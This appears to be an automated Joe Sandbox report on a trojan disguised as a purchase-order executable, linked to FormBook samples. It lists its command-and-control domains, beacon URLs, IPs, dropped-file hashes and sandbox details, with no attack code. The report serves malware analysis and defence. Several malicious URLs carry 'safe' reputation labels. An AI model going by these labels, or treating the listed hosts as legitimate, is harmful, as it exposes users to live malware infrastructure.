          http://www.zoc-marriage.xyz/ge07/0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          94950.bodis.com
          		199.59.243.227
          		truetrue
            		unknown
            www.6282.xyz
            		156.235.1.30
            		truetrue
              		unknown
              www.rkgexg.top
              		unknown
              		unknowntrue
                		unknown
                www.sfmoreservicesllc.lat
                		unknown
                		unknowntrue
                  		unknown
                  www.ostcanadantpl.top
                  		unknown
                  		unknowntrue
                    		unknown
                    www.9net88.net
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.6282.xyz/ge07/?VN9H=FOymHjEy8INtRP80ztKDHy+SkTRNuxtAsSGbgkPqAuR0sH6nXW9AVXeVOt+ErvTzet/o&H0Gx7d=DzrdohnPa4vXCBqtrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.9net88.net/ge07/false
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://word.office.comonexplorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://www.giyztm.xyz/ge07/www.oal-ahzgwo.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.g18q11a.topReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.lasterdeals.shopReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.dvle-father.xyz/ge07/www.f7y2i9fgm.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.9net88.netReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://www.wner-nyquh.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://powerpoint.office.comcemberexplorer.exe, 00000003.00000000.2061373249.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3296359647.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://www.ostcanadantpl.top/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.lasterdeals.shop/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ecurityemployment.today/ge07/www.wner-nyquh.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://excel.office.comexplorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://www.zoc-marriage.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://schemas.microexplorer.exe, 00000003.00000000.2059075313.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3290832822.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.2059048265.0000000008870000.00000002.00000001.00040000.00000000.sdmpfalse
                                  		high
                                  http://www.f7y2i9fgm.xyz/ge07/www.giyztm.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sfmoreservicesllc.lat/ge07/www.6282.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.rowadservepros.net/ge07/www.dvle-father.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sfmoreservicesllc.latexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.giyztm.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.6282.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.6282.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.9net88.net/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.sfmoreservicesllc.lat/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.f7y2i9fgm.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.rowadservepros.net/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.giyztm.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.dvle-father.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.rowadservepros.netexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.wner-nyquh.xyz/ge07/www.lasterdeals.shopexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.ostcanadantpl.topReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.dvle-father.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000003.00000002.3296660560.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061373249.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3098294743.000000000C513000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.giyztm.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.ecurityemployment.todayReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.epehr.picsexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.f7y2i9fgm.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.oal-ahzgwo.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://wns.windows.com/)sexplorer.exe, 00000003.00000002.3291923932.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2059543443.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.ostcanadantpl.topexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000002.3297093239.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095137510.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2061877271.000000000C81C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.ecurityemployment.today/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.g18q11a.topexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rkgexg.topexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rkgexg.top/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wner-nyquh.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.dvle-father.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.epehr.pics/ge07/explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.lasterdeals.shop/ge07/www.zoc-marriage.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://outlook.comexplorer.exe, 00000003.00000000.2059543443.0000000009B8C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3292694913.0000000009B8D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095180726.0000000009B8A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.6282.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.g18q11a.top/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.lasterdeals.shopexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.rkgexg.top/ge07/www.9net88.netexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.oal-ahzgwo.xyz/ge07/www.epehr.picsexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.9net88.net/ge07/www.ecurityemployment.todayexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.oal-ahzgwo.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.9net88.netexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.sfmoreservicesllc.latReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.rowadservepros.netReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.wner-nyquh.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ostcanadantpl.top/ge07/www.rkgexg.topexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.6282.xyz/ge07/www.ostcanadantpl.topexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3289689202.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3095465738.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.2057742779.00000000076F8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.g18q11a.top/ge07/www.rowadservepros.netexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zoc-marriage.xyzReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zoc-marriage.xyz/ge07/www.g18q11a.topexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.f7y2i9fgm.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.oal-ahzgwo.xyzexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rkgexg.topReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.msn.com/explorer.exe, 00000003.00000000.2059543443.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3291923932.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.epehr.picsReferer:explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.vexplorer.exe, 00000003.00000000.2055532925.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3285665342.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.ecurityemployment.todayexplorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.zoc-marriage.xyz/ge07/explorer.exe, 00000003.00000003.3094469632.000000000CA53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3297871427.000000000CA51000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          156.235.1.30
                                                          		www.6282.xyzSeychelles
                                                          		40065CNSERVERSUStrue

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1548508
                                                          Start date and time:2024-11-04 15:27:06 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 19s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:9
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:1
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:Purchase order MIPO2425110032.exe
                                                          Detection:MAL
                                                          Classification:mal100.troj.evad.winEXE@1033/1@5/1
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 100%
                                                          • Number of executed functions: 49
                                                          • Number of non-executed functions: 307
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                          • VT rate limit hit for: Purchase order MIPO2425110032.exe

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          09:28:00API Interceptor1512533x Sleep call for process: explorer.exe modified
                                                          09:28:48API Interceptor2031885x Sleep call for process: ipconfig.exe modified

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          94950.bodis.comPI916810.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          PO23100072.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          Enquiry.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                          • 199.59.243.227
                                                          www.6282.xyzInvoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                          • 156.235.1.30

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CNSERVERSUSnan.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 154.90.62.9
                                                          4.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 154.90.62.9
                                                          na.elfGet hashmaliciousMiraiBrowse
                                                          • 23.228.57.202
                                                          la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                          • 154.91.164.199
                                                          m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 41.216.185.134
                                                          mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 41.216.185.111
                                                          P8CHOkdp62.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 154.90.62.9
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 154.90.62.142
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 154.90.62.142
                                                          na.elfGet hashmaliciousUnknownBrowse
                                                          • 154.90.62.142

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Temp\harrowment

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Purchase order MIPO2425110032.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):189440
                                                          Entropy (8bit):7.866184617462391
                                                          Encrypted:false
                                                          SSDEEP:3072:8PCjh43NRsUfH8V6GQFnUnbN3h5UfcODxBRPUZiIsLTP/3IS7BtWAy7/1ZOcT:8at434MSvIUbBh5U17RPMifLDXd7yPT
                                                          MD5:B8F460AB9C986BBF3A449307FD86C814
                                                          SHA1:1A42EF2F1BCDA1BF8ED4DB87663FCB69FE8B09FA
                                                          SHA-256:ACB60DCDCDE4CB4D52CF8A8F057D1DC0C4B04EEB50F6F604FC88D4F20E2B98AB
                                                          SHA-512:C85E8284106BC2B46CE04790A8D784F3206FC0D675C282166DAC9185A504B6EC03E622382C2B00800691D49773A84925AEC4B44B4E6942973A8749626A8A60F3
                                                          Malicious:false
                                                          Reputation:low
